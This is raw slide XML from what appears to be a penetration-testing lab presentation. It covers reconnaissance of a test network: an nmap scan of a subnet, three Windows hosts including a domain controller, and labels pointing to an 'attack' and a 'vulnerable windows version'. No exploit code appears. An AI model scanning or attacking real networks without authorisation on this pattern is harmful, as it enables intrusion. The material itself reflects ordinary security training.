                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D464FED6-E534-098A-612F-C1C789B55FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2514600"/>
            <a:ext cx="3643674" cy="3368675"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> -A 192.168.164.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Three Machines will be identified using NMAP search.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Windows 10 which is Managed by An Active Directory named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MOVIE_REV.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP:192.168.164.144.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1700" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>peterlimmovierev</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B72CC0-E2C8-2FFD-824B-D6427F2A1900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="19270" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4245331" y="182880"/>
            <a:ext cx="7742793" cy="633679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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789670BE-FD98-2551-6255-C869975CC29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636008" y="3264408"/>
            <a:ext cx="3904488" cy="50292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193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273918-73D1-90ED-B805-0E22B79C37E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="91441"/>
            <a:ext cx="9905998" cy="2523743"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2. Windows 10 build 18362 Not Managed by any Active Directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP:192.168.164.153</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hostname: PETERLIM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBF67C7-7851-262A-70AB-7F33C5A6A5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1645921"/>
            <a:ext cx="9905998" cy="3986784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C51817-4631-5C4E-6997-710CCEB4A6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5632703"/>
            <a:ext cx="9905998" cy="1133855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB7F91A0-F82D-AAE7-B769-0D56249FFD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673352" y="4407408"/>
            <a:ext cx="3675888" cy="46634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739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2B8D2-9B24-25C6-0C60-B2214C7C6AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="384049"/>
            <a:ext cx="9905998" cy="2450592"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3. Windows machine Running Windows Active Directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hostname: MOVIEREV-DC</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Active Directory: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MOVIE_REV.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B76F64-7905-30F0-EA1F-8A0A24DC59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2266546"/>
            <a:ext cx="9905998" cy="2588918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05DD0DA-C544-8AF8-DA25-CBAFC661F0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4855464"/>
            <a:ext cx="9905998" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5277E12D-3699-72FE-2534-F9595D2ED149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3675888" y="4379976"/>
            <a:ext cx="7260336" cy="13716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574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266" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="609600"/>
            <a:ext cx="9905998" cy="1468582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"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Business Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11268" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF36A1A-0365-24B4-D52F-4FE829C25E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2398670103"/>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296A-82DB-CB03-337B-D660E1151ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988630" y="4363271"/>
            <a:ext cx="10200986"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IP address Allocations for the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">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network&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B66936-3434-81EF-5B29-EFC39A324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5992" y="73152"/>
            <a:ext cx="6473618" cy="4120539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB95B55-35C1-DDB9-9A85-8EF47D1142E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6601969" y="1344340"/>
            <a:ext cx="5590032" cy="2331548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1022894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3CD4-8D95-D455-BFA6-3706E98C3E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562357" y="40322"/>
            <a:ext cx="9534078" cy="652272"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RECONNAISSANCE ON THE WINDOWS MACHINES</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EE4580-6E0D-AD36-BCE6-B68D827E6A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562357" y="374904"/>
            <a:ext cx="9534078" cy="1983986"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>From the Nmap scan results, we observed two machines with identical hostnames. One of these machines is managed by the Active Directory, while the other is not. The unmanaged machine could likely be Peter Lim’s personal device, whereas the managed one is part of the company's Active Directory network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9161A10A-97AA-AD88-64BF-EDFD637EF5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="563816" y="1829498"/>
            <a:ext cx="5869173" cy="4934014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95DFE5AD-2864-8E5A-A2CF-537D78C1332C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551861" y="1829498"/>
            <a:ext cx="5486946" cy="4934014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E92E209-06E8-F94E-55D0-6725CEF86ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2395729" y="2907792"/>
            <a:ext cx="1556094" cy="52120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A78BFC3C-D297-3C97-980A-1425348643D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3723938" y="3352670"/>
            <a:ext cx="1817450" cy="2910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C7A929-074D-73CB-CED0-D5604FF350A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951823" y="5937610"/>
            <a:ext cx="2293529" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Vulnerable windows version</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
